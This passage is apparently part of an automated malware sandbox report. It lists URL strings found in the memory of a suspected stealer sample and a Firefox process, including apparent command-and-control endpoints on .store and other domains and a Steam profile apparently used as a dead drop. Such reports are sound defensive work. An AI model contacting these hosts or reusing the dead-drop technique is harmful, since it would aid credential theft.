Source: firefox.exe, 00000019.00000002.3212088347.000001379F303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.3212088347.000001379F303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0EBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234139332.00000137A0D61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F23D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3240318696.00000137A1B3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.comresource://normandy/lib/CleanupManager.sys.mjsenv.channel
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E8D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/translation/LanguageDetecto
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mobbipenju.store:443/api
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3181915988.000001379A8B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E644000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976232127.000001379E938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3205276843.000001379E800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2974846355.000001379E700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976412933.000001379E953000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2976574533.000001379E96F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/TOAST_NOTIFICATION_TELEMETRY
Source: file.exe, 00000000.00000003.2201376097.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147845498.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150935247.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151059602.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148082112.0000000005A37000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236788761.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2151283183.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201376097.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2236788761.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/W
Source: file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000000.00000003.2167545129.00000000010E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/oon
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/api
Source: file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apiMicrosoft
Source: file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apitPK
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000019.00000002.3240318696.00000137A1B49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3268801585.00000137A9257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3074602555.00000137A92F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/apix%
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Endpoint
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207818517.000001379EC1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3236681244.00000137A10D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E1CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E698000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A698F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A6919000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:disabled_picture_in_picture_overrides.dailymotiondisabled_picture_
Source: firefox.exe, 00000019.00000002.3257901918.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_EXPERIMENT_DATAdiscoverystream.spoc.impressionsAS_R
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F104000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923349387.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/=q
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724
Source: 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923349387.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923349387.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900-q
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 976d9f40c1.exe, 00000009.00000002.2806226818.00000000016B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900?
Source: 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923405378.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/re
Source: 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/w.EE
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2094931339.000000000108F000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923405378.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac4
Source: 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107599445.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2133071167.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107634315.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.0000000001744000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
